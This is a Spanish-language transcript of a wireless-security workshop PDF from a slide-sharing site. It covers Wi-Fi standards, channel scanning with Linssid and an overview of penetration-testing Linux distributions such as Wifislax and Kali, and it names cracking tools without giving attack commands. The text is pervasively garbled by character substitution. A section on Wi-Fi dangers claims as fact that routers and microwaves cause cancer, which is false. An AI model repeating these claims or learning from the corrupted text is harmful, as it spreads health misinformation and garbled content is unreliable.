taller de seguridad inalambrica.pdf

260
TALLER DE SEGURIDAD INALAMBRICA Este obra está bajo una licencia de Creative Commons Reconocimiento- NoComercial-CompartirIgual 4.0 Internacional . 1

Upload: shinigami01001

Post on 02-Jun-2018

285 views

Category:

Documents


2 download

TRANSCRIPT

Page 1: Taller de Seguridad Inalambrica.pdf

8/11/2019 Taller de Seguridad Inalambrica.pdf

http://slidepdf.com/reader/full/taller-de-seguridad-inalambricapdf 1/260

TALLER DESEGURIDAD

INALAMBRICA

Este obra está bajo una licencia de Creative Commons Reconocimiento-NoComercial-CompartirIgual 4.0 Internacional.

1

Page 2: Taller de Seguridad Inalambrica.pdf

8/11/2019 Taller de Seguridad Inalambrica.pdf

http://slidepdf.com/reader/full/taller-de-seguridad-inalambricapdf 2/260

Índice

Introducción a las redes wii

!istribuciones "inu# para auditoria de seguridad inalambricaIntroducción a $iisla#%rimeros pasosCreación de "iveC!Creación de "ive&'(Creación de %articiones desde $iisla#) con *%arted + %artition,agicInstalación de $iisla# en !Instalación de módulos "iveC!) "ive&'() !!Comandos "inu# básicosComandos de ircrac/-ng

erramientas de $iisla#Cirados%otenciaCredenciales!iccionariosorenses*estores de Cone#iónardware 1oolsRedes'uite aircrac/1esting$iisla# !ocumentation$ireless$pa$pa wps!evelopment*ráicosInternet

erramientas para ndroid

Ingenier2a 'ocialReporte de uditoriasComo reali3ar un mapa de puntos de accesoComo montar una red wii + conigurar los repetidores(ibliogra2a

2

Page 3: Taller de Seguridad Inalambrica.pdf

8/11/2019 Taller de Seguridad Inalambrica.pdf

http://slidepdf.com/reader/full/taller-de-seguridad-inalambricapdf 3/260

Este obra está bajo una licencia de Creative Commons Reconocimiento-NoComercial-CompartirIgual 4.0 Internacional.

"as condiciones de la licencia son las siguientes&sted es libre de  Compartir  - copiar + redistribuir el material en cual5uier medio o ormato  Adaptar  - re me3cla) transormar + construir sobre el material  El licenciante no puede revocar estas libertades) siempre + cuando sigalos t6rminos de la licencia.(ajo las siguientes condiciones  Reconocimiento - &sted debe dar el cr6dito apropiado) proporcionar unenlace a la licencia) e indicar si se 7an reali3ado cambios. %uede 7acerlo en

cual5uier orma ra3onable) pero no de cual5uier manera 5ue sugiere ellicenciante usted o su uso 7ace su+a.  No comercial - No puede utili3ar el material con ines comerciales.  Compartir igual - 'i usted modiica) transorma o amplia el material) debedistribuir sus contribuciones bajo la misma licencia 5ue el original.  No ha re!triccione! adicionale! - Es posible 5ue no se apli5uen lost6rminos legales o medidas tecnológicas 5ue restringen legalmente otros de7acer cual5uier cosa 5ue los permisos de licencia.

Este documento ue creado para un 1aller de 'eguridad Inalambrica de unCentro 'ocial + esta basado en el ,anual (ásico de $iisla# reali3ado para'eguridad $ireless 8www.seguridadwireless.net9 + otras uentes 5ue sepueden ver en el apartado de (ibliogra2a al inal del documento.

"a intención del mismo es divulgar los conocimientos sobre seguridad +auditoria inalambrica para poder comprobar la seguridad o inseguridad denuestras redes inalambricas. En ning:n caso debemos usarlo para acceder aredes ajenas o de las 5ue no tenemos el permiso de auditar de supropietario.

Introducci"n a la! rede! #i$i"a especiicación IEEE ;0<.== 8I'>?IEC ;;0<-==9 es un estándar internacional 5ue deine las caracter2sticas de una red de área localinalámbrica 8$"N9. $i-i 85ue signiica @idelidad inalámbrica@) a vecesincorrectamente abreviado $ii9 es el nombre de la certiicación otorgadapor la $i-i lliance) anteriormente $EC 8$ireless Et7ernet Compatibilit+

 lliance9) grupo 5ue garanti3a la compatibilidad entre dispositivos 5ue utili3anel estándar ;0<.==. %or el uso indebido de los t6rminos 8+ por ra3ones demar/eting9 el nombre del estándar se conunde con el nombre de la

3

Page 4: Taller de Seguridad Inalambrica.pdf

8/11/2019 Taller de Seguridad Inalambrica.pdf

http://slidepdf.com/reader/full/taller-de-seguridad-inalambricapdf 4/260

certiicación. &na red $i-i es en realidad una red 5ue cumple con elestándar ;0<.==. los dispositivos certiicados por la $i-i lliance se lespermite usar este logotipoEn la actualidad las redes $ii son las 5ue orecen la ma+or cantidad de

beneicios al costo más bajo entre todas las tecnolog2as inalámbricas. Eseconómica) interoperable con e5uipos de dierentes abricantes + puede ser e#tendida para orecer uncionalidades muc7o más allá de las previstasoriginalmente por los abricantes.Esto se debe a 5ue $ii utili3a estándares abiertos ;0<.== con el cual lospuntos de acceso) portátiles) pcs) tablets + móviles pueden intercomunicarse."ogotipo de certiicación $i-i.

"as redes $ii 8 ;0<.==9 usan recuencias abiertas 5ue no re5uieren licencia+ son las siguientes

• "as bandas I', 8Industrial) 'cientiic and ,edical9permiten el uso delas porciones <.4-<.A *3) A.; *3) + muc7as otras recuencias 8noutili3adas en$ii9.

• "as bandas&NII 8&nlicensed National InormationInrastructure 9permiten el uso sin licencia de otras porciones del espectro de A*7ana.

Bamos a ver a continuación una tabla resumen los protocolos wii delestándar ;0<.== mas usados

E!t%ndar &elocidad m%'ima Banda!

;0<.==a A4 ,bps A *3;0<.==b == ,bps <.4 *3;0<.==g A4 ,bps <.4 *3;0<.==n 00 ,bps <.4 *3 + A *3;0<.==ac ;00 ,bps A *3uente Elaboración propia usando datos de la sociación IEEE

4

Page 5: Taller de Seguridad Inalambrica.pdf

8/11/2019 Taller de Seguridad Inalambrica.pdf

http://slidepdf.com/reader/full/taller-de-seguridad-inalambricapdf 5/260

Canale! en ()*+,,-.i/i0

"os dispositivos $ii deben usar el mismo canal para poder comunicarse.Ellos env2an + reciben en el mismo canal) por lo 5ue sólo un dispositivopuede transmitir en un instante determinado. Este modalidad de transmisiónse llama 7al- duple#.En comunicaciones 7al-duple# sólo un dispositivo puede estar transmitiendo

1erramienta Lin!!idBamos a ver a continuación como descargar) instalar + usar la erramienta"inssid 5ue nos servirá para ver en 5ue canales están transmitiendo lospuntos de acceso cercanos) con 5ue potencia) etc para evitar solapamientode canales + mejorar el rendimiento de nuestro punto de acceso.Esta 7erramienta viene por deecto en $iisla#.'i usamos otra distribución "inu# para instalarlo tenemos estas < opciones=. Bamos a 7ttp??sourceorge.net?projects?linssid? + descarganos el arc7ivodeb para nuestra distribucion debian o derivada 8amd4 o iD;9. &na ve3

descargado lo ejecutamos en la ventana 5ue nos abre + le damos a instalar pa5uete.<. adimos el ppa de linssid a nuestro arc7ivo sources.list usando nuestroeditor de te#tos avorito 8nano) vim) gedit) leapad9

 brimos el terminal + escribimossudo leafpad /etc/apt/sources.listaadimos la lineadeb http://ppa.launchpad.net/wseverin/ppa/ubuntu  precisemainEn el terminal ponemossudo apt-get updatesudo apt-get install linssid

&na ve3 instalado se nos aadirá un acceso directo en el men: de inicio. "oabrimos + nos pedirá la contrasea de root. 'i nos da el siguiente error@&nable to continue. Cannot ind interace pipe@

 brimos el terminal + ponemossudo cat /proc/net/wirelesssudo apt-get install iw

sudo iw list

5

Page 6: Taller de Seguridad Inalambrica.pdf

8/11/2019 Taller de Seguridad Inalambrica.pdf

http://slidepdf.com/reader/full/taller-de-seguridad-inalambricapdf 6/260

"uego volvemos a abrir linssid desde el men: inicio + metemos la clave deroot cuando la pida.&na ve3 abierto + reali3ado el escaneado de las redes podemos ver una

pantalla similar a esta

En la parte de arriba podemos ver la inormación de las redes cercanas

''I!) ,C)cana) modo) seguridad) protocolo) cirado) recuencia) calidad)seal) ruido) etc.En el gráico de abajo podemos ver las distintas redes) sus respectivoscanales + potencia de las recuencias <)4 + A*73.'i 5ueremos instalar un punto de acceso debemos ponerlo en el canal en el5ue 7a+a menos redes o aun5ue 7a+a redes tengan una potencia menor.'i no esta ocupado + nuestro router + adaptador wii permite usar ese canales recomendable usar el canal =D o =4 +a 5ue suele estar libre + muc7osdispositivos antiguos no trabajan en esos canales.

Topolog2a! de rede! inal%m3rica!1oda red inalámbrica compleja está constituida por la combinación de unomás de los siguientes tipos de cone#iones

6

Page 7: Taller de Seguridad Inalambrica.pdf

8/11/2019 Taller de Seguridad Inalambrica.pdf

http://slidepdf.com/reader/full/taller-de-seguridad-inalambricapdf 7/260

• %unto-a-%unto

• %unto-a-,ultipunto

• ,ultipunto-a-,ultipunto

Modo! de $uncionamiento de lo! router .i/i"os dispositivos $ii pueden operar en alguno de los siguientes modos

• ,aster 8% -access point-9• ,anaged 8tambi6n llamado modo cliente9•

 d-7oc 8usado en redes en malla9

7

Page 8: Taller de Seguridad Inalambrica.pdf

8/11/2019 Taller de Seguridad Inalambrica.pdf

http://slidepdf.com/reader/full/taller-de-seguridad-inalambricapdf 8/260

• ,onitor 8no usado normalmente para comunicaciones9%odemos dierenciar < grandes tipos de dispositivosRouters $ii Normalmente uncionan en modo master como %unto de

 cceso 8% -access point-9 ) pero pueden uncionar en el resto de modos.

 daptadores $ii 'on una pe5uea placa con un receptor wii 5ue suelenestar dentro de la ma+or2a de portatiles modernos) en tarjetas pci para pcs desobremesa o en adaptadores wii usb. Cuando empe3aron a comerciali3arsesolo pod2an uncionar en modo managed o ad-7oc pero 7o+ en d2a puedenuncionar en todos los modos en "inu#. 'obre $indows la ma+or2a solosiguen admitiendo modo managed o ad-7oc. %or ese motivo para la auditoriainalambrica siempre se usan distribuciones "inu#.

4eligro! de la! rede! #i$i"a e#posición prolongada a emisiones de radiorecuencia como las de los

puntos de acceso wii o las antenas de teleon2a móvil con alta potenciapueden causar cancer u otras enermedades.&n router wii es emite en las bandas de <)4A*73 o A*73 + tiene unapotencia má#ima de =00m$. Esta potencia no es mu+ elevada pero sueleestar encencido siempre por lo 5ue la e#posición a las radiaciones esprolongada."as ondas de las redes $ii usan la misma banda 5ue los microondasconvencionales 8<)4A*739 aun5ue estos tienen :ltimos tienen una potenciama+or 8de A00 o 00m$9. Esta comprobado 5ue el microondas causa cancer 

si su uso es prolongado. !e todas ormas el microondas cuando lo usamosesta encendido < o D min) no continuamente como los puntos de acceso wii.

!ado 5ue uncionan en la misma recuencia como es lógico no esrecomendable situar un microondas cerca de un router wii dado 5ue aluncionar crearia muc7as intererencias.

8

Page 9: Taller de Seguridad Inalambrica.pdf

8/11/2019 Taller de Seguridad Inalambrica.pdf

http://slidepdf.com/reader/full/taller-de-seguridad-inalambricapdf 9/260

&n punto de acceso emisor wii o de teleon2a móvil es e#actamente lomismo 5ue tener el microondas encendido con la puerta abierta +uncionando todo el tiempo 8aun5ue con una potencia muc7o menor9

En reerencia al problema de las ondas electromagneticas vamos a 7acer un

breve comentario a la nueva Le General de Telecomunicacione!aprobada por el congreso el <F de bril.En el articulo D4 de dic7a le+ pone lo siguienteG"a dministración del Estado + las administraciones p:blicas deberáncolaborar a trav6s de los mecanismos previstos en la presente "e+ + en elresto del ordenamiento jur2dico) a in de 7acer eectivo el derec7o de losoperadores de comunicaciones electrónicas de ocupar la propiedad p:blica +privada para reali3ar el despliegue de redes p:blicas de comunicacioneselectrónicas.HG!e esta manera) dic7a normativa o instrumentos de planiicación no podránestablecer restricciones absolutas o desproporcionadas al derec7o deocupación del dominio p:blico + privado de los operadores ni imponer soluciones tecnológicas concretas) itinerarios o ubicaciones concretas en los5ue instalar inraestructuras de red de comunicaciones electrónicas. En estesentido) cuando una condición pudiera implicar la imposibilidad de llevar acabo la ocupación del dominio p:blico o la propiedad privada) elestablecimiento de dic7a condición deberá estar plenamente justiicado e ir acompaado de las alternativas necesarias para garanti3ar el derec7o deocupación de los operadores + su ejercicio en igualdad de condiciones.H

En deinitiva las operadoras de 1elecomunicaciones podrán ocupar propiedad p:blica + privada para instalar sus antenas + e5uipos sin tener cuenta la cantidad de personas 5ue están enermando + contra+endo cancer por la e#posición continua a los campos electromagn6ticos pulsantes de lateleon2a móvil) D*) 4*) $ii) $ima#) + otras tecnolog2as 5ue emiten ondasde alta recuencia con altas potencias 5ue son perjudiciales para la salud delos 5ue estan cerca de la estación emisora.

 lgunas recomendaciones

9

Page 10: Taller de Seguridad Inalambrica.pdf

8/11/2019 Taller de Seguridad Inalambrica.pdf

http://slidepdf.com/reader/full/taller-de-seguridad-inalambricapdf 10/260

• Tiempo de e'po!ici"n "a reducción del tiempo de e#posicióndisminu+e las dosis de rediación recibidas. 'i no esto+ usando lacone#ión wii apagar el router + mantener el router apagado cuandodormimos. 'i podemos conectarnos por cable de red + desactivar el

wii.• Di!tancia al emi!or  Como norma general la e#posición a radiacionesdisminu+e rápidamente a medida 5ue aumenta la distancia entre eloco emisor + el individuo. El aumento de la distancia es la :nicamedida preventiva eectiva para disminuir la e#posición a camposmagn6ticos estáticos. No permanecer nunca de manera prolongada amenos de D0cm de un router wii en uncionamiento ni a menos de D0mde una estación emisora?repetidora de teleon2a móvil) $ima# o similar.

• Apantallamiento5 %ara los casos mas graves. %or ejemplo si tenemosuna antena emisora de teleonia móvil mu+ cerca 8o encima9 de

nuestra vivienda.

Di!tri3uci"ne! Linu' para auditoria de !eguridad inalam3rica

.i$i!la'Es una distribución *nu?"inu# basada en 'lac/ware especiali3ada en laauditoria de redes inalámbricas 8$ireless9 + tests de penetración. 1ienemuc7isimas 7erramientas mu+ :tiles sencillas de usar de auditoriainalambrica + de redes + es la mas recomendable tanto para iniciados comopara los usuarios mas e#perimentados. %uede ser usada como "iveC!)"ive&'( o instalarse en el disco duro. En este taller es la 5ue

10

Page 11: Taller de Seguridad Inalambrica.pdf

8/11/2019 Taller de Seguridad Inalambrica.pdf

http://slidepdf.com/reader/full/taller-de-seguridad-inalambricapdf 11/260

recomendamos. Beremos más adelante en detalle como usar estadistribución + las 7erramientas 5ue inclu+e.

'itio web 7ttp??www.wiisla#.com 

.i$i#a$iiwa+ es un live C! 5ue) basado en el sistema operativo "inu# &buntu)puede ser ejecutado sin necesidad de instalación directamente desde elC!R>, o tambi6n desde el disco duro como "ive!) además de poderseinstalar en memorias &'( o en disco duro. $iiwa+ es un linu# live cddiseado por www.seguridadwireless.net  + esta adaptado para el la auditor2awireless. "a :ltima versión de $iiwa+ es la D.4. El e5uipo de desarrollo dejode sacar nuevas versiones + recomienda en su web el uso de $iisla# 5uetambien desarrollan.

11

Page 12: Taller de Seguridad Inalambrica.pdf

8/11/2019 Taller de Seguridad Inalambrica.pdf

http://slidepdf.com/reader/full/taller-de-seguridad-inalambricapdf 12/260

'itio web7ttp??www.wiiwa+.org 

6ali Linu'ali "inu# esta desarrollado + >ensive 'ecurit+) el mismo e5uipo 5uedesarrollo (ac/1rac/ "inu# + es una reconstrución de esta distribución conlas 7erramientas de seguridad 7abituales pero basandose completamente en!ebian como distribución base. 1oda la nueva inraestructura ue puesta ensu lugar +a adaptada) todas las 7erramientas ueron revisadas +empa5uetadas) + se usa *it para el BC'.

• ,ás de D00 7erramientas de pruebas de penetración !espu6s derevisar todas las 7erramientas 5ue se inclu+ó en (ac/1rac/ ) 7emoseliminado un gran n:mero de 7erramientas 5ue o bien no uncionano ten2a otras 7erramientas disponibles 5ue proporcionan unauncionalidad similar.

Es código abierto + siempre lo será ali "inu#) al igual 5ue supredecesor (ac/trac/) es completamente gratis + siempre lo será.&sted nunca) nunca tendrá 5ue pagar por ali "inu#.

• Código abierto en *it 'omos grandes deensores del sotware decódigo abierto + nuestro árbol de desarrollo está disponible para 5uetodos puedan ver + todas las uentes están disponibles para a5uellos5ue desean modiicar + reconstruir pa5uetes.

• ' ali 7a sido desarrollado para cumplir con el estándar de jerar5u2a del sistema de arc7ivos ) 5ue permite a todos los usuarios

12

Page 13: Taller de Seguridad Inalambrica.pdf

8/11/2019 Taller de Seguridad Inalambrica.pdf

http://slidepdf.com/reader/full/taller-de-seguridad-inalambricapdf 13/260

Page 14: Taller de Seguridad Inalambrica.pdf

8/11/2019 Taller de Seguridad Inalambrica.pdf

http://slidepdf.com/reader/full/taller-de-seguridad-inalambricapdf 14/260

Page 15: Taller de Seguridad Inalambrica.pdf

8/11/2019 Taller de Seguridad Inalambrica.pdf

http://slidepdf.com/reader/full/taller-de-seguridad-inalambricapdf 15/260

'itio web 7ttp??www.bac/trac/-linu#.org 

8iaopan 9SKiaopan >' es una distribucion ácil de usar para los principiantes +e#pertos) 5ue inclu+e una serie de 7erramientas de 7ac/ing avan3adas parapenetrar las redes inalámbricas $% ? $%< ? $%' ? $E%.(asado en el sistema operativo 8'>9) 1in+ Core "inu# 81C"9 del tiene unaintera3 gráica de usuario 8*&I9 pulida no necesitando escribir los comandosde "inu#. Kiaopan >' es ocupa tan solo M0m + se puede arrancar a trav6sde un pen drive &'() un C! o en una má5uina virtual 8B,9.

 lgunas de las 7erramientas 5ue se inclu+en son Inlator) ircrac/-ng),inidwep *1) KE) wiite + la alimentación con biberón. lgunas tarjetaswii compatibles son R1";=;M") R1D0M0) RF<M= + muc7as otras.

15

Page 16: Taller de Seguridad Inalambrica.pdf

8/11/2019 Taller de Seguridad Inalambrica.pdf

http://slidepdf.com/reader/full/taller-de-seguridad-inalambricapdf 16/260

'itio web7ttp??sourceorge.net?projects?#iaopanos? 

Beini(eini es una distribución ligera 8ocupa mg9 para la auditor2a inalambrica."a :ltima versión de (eini incorpora las :ltimas actuali3aciones 7asta laec7a de eeding-bottle + de ,inidwep-gt/.

  parte de eedingbottle + minidwep-gt/ (eini tiene la 7erramienta Reaver lacual se utili3a para crac/ear las redes $%?$%< 5ue tienen el estándar 

$%'. Esto 7a 7ec7o 5ue los iconos de minidwep-gt/ + eedingbottledesapare3can del escritorio de (eini.

16

Page 17: Taller de Seguridad Inalambrica.pdf

8/11/2019 Taller de Seguridad Inalambrica.pdf

http://slidepdf.com/reader/full/taller-de-seguridad-inalambricapdf 17/260

'itio web7ttp??www.beini.es !escarga de iso 7ttp??sourceorge.net?projects?#iaopanos?iles?(eini? 

Node:ero Linu'"as pruebas de penetración + la auditor2a de seguridad re5uiere7erramientas especiali3adas. El camino natural 5ue nos conduce a larecogida a todos en un lugar de ácil acceso. 'in embargo la orma en 5ue seaplica esta colección puede ser undamental para la orma de implementar eica3 + pruebas sólidas.'e dice 5ue la necesidad es la madre de toda invención + Nodeero "inu# noes dierente. Nuestro e5uipo está construido de testers + desarrolladores)5ue 7an venido con el censo 5ue viven los sistemas no orecen lo 5ue

necesitan en sus auditor2as de seguridad. !istribuciones de %enetration1esting tienden a 7aber utili3ado 7istóricamente el @"ive@ concepto desistema de "inu#) lo 5ue realmente signiica 5ue ellos tratan de no 7acer eectos permanentes a un sistema. Ergo todos los cambios se 7an ido alreiniciar el sistema) + van desde los medios de comunicación) tales comodiscos + unidades de &'(. 'in embargo todo lo 5ue esto tal ve3 mu+ :tilpara las pruebas de ve3 en cuando) su utilidad puede ser agotado cuando seestá probando con regularidad. Es nuestra creencia de 5ue @de "ive '+stem@simplemente no escala bien en un entorno de pruebas sólidas.

17

Page 18: Taller de Seguridad Inalambrica.pdf

8/11/2019 Taller de Seguridad Inalambrica.pdf

http://slidepdf.com/reader/full/taller-de-seguridad-inalambricapdf 18/260

1odos sin embargo Nodeero "inu# puede ser usado como un @sistema vivo@para las pruebas de ve3 en cuando) su uer3a real viene de la comprensiónde 5ue un probador re5uiere un sistema uerte + eiciente. Esto se logra ennuestra creencia de 5ue trabaja en una distribución 5ue es una instalación

permanente 5ue se beneicia de una uerte selección de las 7erramientas)integradas con un entorno "inu# estable.Nodeero "inu# es coniable) estable + potente. 1iene como base ladistribución &buntu. Nodeero "inu# toma toda la estabilidad + la iabilidad5ue se obtiene con el modelo de soporte a largo pla3o de &buntu) + su poder viene de las 7erramientas coniguradas para la seguridad.

'itio web 7ttp??www.node3ero-linu#.org 

Bac7Bo'(ac/(o# es una distribución "inu# basada en &buntu. a sido desarrolladopara reali3ar pruebas de penetración + evaluaciones de seguridad. !iseadopara ser rápido) ácil de usar + proporcionan un entorno de escritoriocompleto a:n m2nima) gracias a sus propios repositorios de sotware )siempre actuali3ado a la :ltima versión estable de las 7erramientas de7ac/ing 6tico más utili3ados + conocidos .

18

Page 19: Taller de Seguridad Inalambrica.pdf

8/11/2019 Taller de Seguridad Inalambrica.pdf

http://slidepdf.com/reader/full/taller-de-seguridad-inalambricapdf 19/260

Es una distribución live) en la cual se pueden encontrar 7erramientas comoettercap ) Oo7n t7e Ripper ) ,etasploit) Nmap ) $ires7ar/) + muc7as otras.El objetivo principal de (ac/(o# es proporcionar una alternativa ) altamentepersonali3able + sistema de rendimiento. (ac/(o# utili3a el gestor de

ventanas ligero Kce . Inclu+e algunos de los de seguridad + análisis de las7erramientas de "inu# más utili3ados ) con el objetivo de una amplia diusiónde los objetivos ) 5ue van desde el análisis de la aplicación web a la red deanálisis ) a partir de las pruebas de resistencia a la in7alación ) inclu+endotambi6n la evaluación de la vulnerabilidad ) el análisis orense inormático +e#plotación.El poder de esta distribución está dada por su n:cleo repositorio de"aunc7pad constantemente actuali3ado a la :ltima versión estable de las7erramientas de 7ac/ing 6tico más conocidos + utili3ados . "a integración +el desarrollo de nuevas 7erramientas dentro de la distribución sigue el inicio

de la comunidad de código abierto + en particular los criterios de !ebian ree'otware *uidelines .%odemos destacar las siguientes caracteristicas de (ac/(o# "inu#

• El rendimiento + la velocidad son elementos clave %artiendo de ungestor de escritorio KCE debidamente conigurado 5ue orece laestabilidad + la velocidad ) 5ue sólo unos pocos otros !,s puedenorecer ) alcan3ando en ajustes e#tremos de los servicios )coniguraciones) los parámetros de inicio + toda la inraestructura.(ac/(o# 7a sido diseado con el objetivo de conseguir el má#imo

rendimiento + m2nimo consumo de recursos. Esto 7ace (ac/(o# unadistro mu+ rápido + conveniente incluso para las coniguraciones de7ardware antiguos .

• 1odo está en el lugar correcto El men: principal de (ac/(o# 7a sidobien organi3ado + diseado para evitar cual5uier caos ? desordenencontrar 7erramientas 5ue estamos buscando . "a selección de cada7erramienta solo se 7a 7ec7o con la precisión con el in de evitar redundancias + las 7erramientas 5ue tienen uncionalidades similares .

• Con especial atención al usuario inal todas las necesidades ) todos losarc7ivos del men: de coniguración + se 7an organi3ado + se reduce a

un m2nimo esencial ) necesario para proporcionar un uso intuitivo)amigable + ácil de la distribución de "inu#.

• Es compatible con !ebian El proceso de empa5uetado de sotware ) laconiguración + el ajustes del sistema de seguimiento a las l2neas degu2a estándar de &buntu ? !ebian. Cual5uiera de los usuarios de!ebian + &buntu se sentirán mu+ amiliari3ados) mientras 5ue losreci6n llegados se sigue la documentación + la caja de adicionesoiciales de personali3ar su sistema sin ning:n trabajo complicadonada más) +a 5ue es estándar + sencillo P

19

Page 20: Taller de Seguridad Inalambrica.pdf

8/11/2019 Taller de Seguridad Inalambrica.pdf

http://slidepdf.com/reader/full/taller-de-seguridad-inalambricapdf 20/260

• Es versátil Como la distribución live ) (ac/(o# orecer una e#periencia5ue pocos otra distribución puede orecer + una ve3 instalado )naturalmente) se presta a desempear el papel de un sistema deescritorio orientada . *racias al conjunto de los pa5uetes incluidos en

el repositorio oicial 5ue proporciona al usuario un uso ácil + versátildel sistema .• Es amigable 'i desea 7acer cual5uier cambio ? modiicación ) con el in

a la 7abitación a sus propósitos ) o tal ve3 aadir 7erramientasadicionales 5ue no están presentes en los repositorios ) nada podr2aser más ácil de 7acer eso con (ac/(o# . Crea tu propio "aunc7pad%% ) env2e su pa5uete a dev e5uipo + contribuir activamente a laevolución de (ac/(o# "inu#.

'itio web 7ttp??www.bac/bo#.org 

Blac73untu(lac/buntu es la distribución de las pruebas de penetración) 5ue uediseado especialmente para la ormación de estudiantes + proesionales dela seguridad inormática. (lac/buntu es la distribución de las pruebas depenetración con el entorno de escritorio *N>,E.

 5u2 está una lista de 7erramientas de seguridad + pruebas de penetración -

o más bien las categor2as disponibles en el pa5uete (lac/buntu) 8cada

20

Page 21: Taller de Seguridad Inalambrica.pdf

8/11/2019 Taller de Seguridad Inalambrica.pdf

http://slidepdf.com/reader/full/taller-de-seguridad-inalambricapdf 21/260

categor2a tiene muc7as subcategor2as9) pero esto le da una idea general delo 5ue viene con esta distro %entesting

•   Recopilación de inormación)•   ,apeo de Redes)•

  Bulnerabilidad de identiicación)•   %enetración)•   Escalada de privilegios)•   ,antenimiento del cceso)•   nálisis de redes de radio)•   nálisis de BoI%)•   orense !igital)•   Ingenier2a inversa•   'ección Barios.

!ebido a 5ue este se basa &buntu) casi todos los dispositivos + 7ardwaresólo trabajar2an la cual es e#celente +a 5ue desperdicia menos resolviendoproblemas + más tiempo de trabajo.

'itio web 7ttp??sourceorge.net?projects?blac/buntu? 

Samurai .e3 Te!ting /rame#or7"a $eb 1esting ramewor/ 'amurai es un entorno linu# vivo 8live9 5ue 7asido pre - conigurado para uncionar como un entorno de pen -testing para

web. "a distribución contiene lo mejor del código abierto + 7erramientas

21

Page 22: Taller de Seguridad Inalambrica.pdf

8/11/2019 Taller de Seguridad Inalambrica.pdf

http://slidepdf.com/reader/full/taller-de-seguridad-inalambricapdf 22/260

gratuitas 5ue se centran en las pruebas de ata5ue a sitios web. En eldesarrollo de este entorno ) 7emos basado nuestra selección en las7erramientas 5ue utili3amos en nuestra práctica de seguridad. emosincluido las 7erramientas utili3adas en los cuatro pasos de un web pen-test.

  partir de reconocimiento) 7emos incluido 7erramientas como el escáner dedominio ero3 + ,altego . %ara el mapeo ) se 7an incluido 7erramientas como$eb'carab + ratpro#+ . continuación) elegimos las 7erramientas para eldescubrimiento. Estos incluir2an wDa + eructo . %ara la e#plotación) la etapainal) 5ue inclu+e (eE) OK'7ell + muc7o más. Esta distibución tambi6ninclu+e una wi/i preconigurada ) creado para ser el almac6n central deinormación durante el test de penetración.

"a ma+or2a de las pruebas de penetración se centran en cual5uiera de losata5ues de red o ata5ues a aplicaciones web. !ada esta separación )

muc7as pruebas propias de intrusión 7an seguido comprensiblemente unpatrón ) 5ue se especiali3a en un tipo de prueba u otro. ,ientras 5ue talespeciali3ación es un signo de una industria de pruebas de penetración sano+ vibrante ) las pruebas se centraron en sólo uno de estos aspectos de unentorno de destino 5ue con recuencia se olvidan los riesgos de negocioreales de vulnerabilidades descubiertas + e#plotadas por atacantes decididos+ capacitados. ,ediante la combinación de ata5ues de aplicaciones web )como la in+ección 'Q" ) Cross -'ite 'cripting ) + Remote ile Inclu+e a losata5ues de red tales como el escaneo de puertos ) el compromiso deservicio) + la e#plotación del lado del cliente ) los ata5ues son muc7o másletales. "os 5ue 7ace pruebas de penetración + las empresas 5ue utili3an susservicios tienen 5ue entender estos ata5ues combinados + cómo medir si sonvulnerables a ellos. Esta sesión orece ejemplos prácticos de pruebas depenetración ) 5ue combinan estos vectores de ata5ue ) + consejos del mundoreal para la reali3ación de dic7as pruebas en contra de su propiaorgani3ación.'amurai $eb 1esting ramewor/ parece una distribución mu+ limpia + losdesarrolladores se centran en lo 5ue mejor saben 7acer ) en lugar de tratar de agregar todo en una sola distribución + por lo tanto 7acer más di2cil el

apo+o . 'e trata de una manera buena para empe3ar. !ebemos comen3ar con un pe5ueo conjunto de 7erramientas + luego pasar al paso siguiente.

22

Page 23: Taller de Seguridad Inalambrica.pdf

8/11/2019 Taller de Seguridad Inalambrica.pdf

http://slidepdf.com/reader/full/taller-de-seguridad-inalambricapdf 23/260

'itio web 7ttp??samurai.inguardians.com 

6noppi' STD  un5ue su nombre podr2a sonar mu+ daino) en verdad es mu+ :til. '1! sonlas siglas de 'ecurit+ 1ools !istribution. 1ambi6n es conocida como noppi#'1!) esta distro es una versión personali3ada de noppi# + está destinada ausuarios proesionales + novatos 5ue están cómodos trabajando con la l2neade comandos. "as caracter2sticas de '1! inclu+en un buen n:mero de7erramientas de seguridad + administración de redes) las cuales estándivididas en muc7as categor2as como encr+ption utilities) penetration tools)

orensic tools) intrusion detection) pac/et sniers) wireless tools) + passwordcrac/ers. l igual 5ue noppi# ) esta distro está basada en !ebian + se originó en lemania. '1! es una 7erramienta de seguridad . En realidad se trata deuna colección de cientos si no miles de 7erramientas de seguridad de códigoabierto . Es una distribución "inu# "ive 8 es decir) 5ue se ejecuta desde unC! o &'( de arran5ue en la memoria ram sin cambiar el sistema operativonativo de su %C9 . 'u :nico objetivo es poner tantas 7erramientas deseguridad a su disposición con una intera3 lo mas elegante posible.

23

Page 24: Taller de Seguridad Inalambrica.pdf

8/11/2019 Taller de Seguridad Inalambrica.pdf

http://slidepdf.com/reader/full/taller-de-seguridad-inalambricapdf 24/260

"a ar5uitectura es i4; + se e#tiende desde los siguientes e5uipos deescritorio *N>,E ) !E ) "K!E + >penbo# tambi6n . noppi# 7a e#istidodesde 7ace muc7o tiempo - de 7ec7o) creo 5ue ue una de las distrosoriginales en vivo .

noppi# '1! está diseado principalmente para ser utili3ado como un"iveC!?"ive&'( ) tambi6n se puede instalar en un disco duro . El '1! en elnombre noppi# representa erramientas de 'eguridad !istribución . "asección de la criptogra2a es particularmente bien conocido en noppi# ."os desarrolladores + oro oicial puede parecer snob 8me reiero a ver estodesde su Q%regunta 'o+ nuevo en "inu# . !eber2a probar noppi# '1!SRespuesta No. 'i usted es nuevo en "inu# '1! será meramente unobstáculo para su e#periencia de aprendi3aje . &tilice noppi# en su lugar .%ero bueno) no es todos los usuarios de distribuciones %entest son as2 S 'i

usted no puede tomar el calor ) tal ve3 no deber2as estar intentando unadistro pentest despu6s de todo. elicitaciones a los '1! dev por 7ablar sumente .

'itio web 7ttp??s-t-d.org 

24

Page 25: Taller de Seguridad Inalambrica.pdf

8/11/2019 Taller de Seguridad Inalambrica.pdf

http://slidepdf.com/reader/full/taller-de-seguridad-inalambricapdf 25/260

Page 26: Taller de Seguridad Inalambrica.pdf

8/11/2019 Taller de Seguridad Inalambrica.pdf

http://slidepdf.com/reader/full/taller-de-seguridad-inalambricapdf 26/260

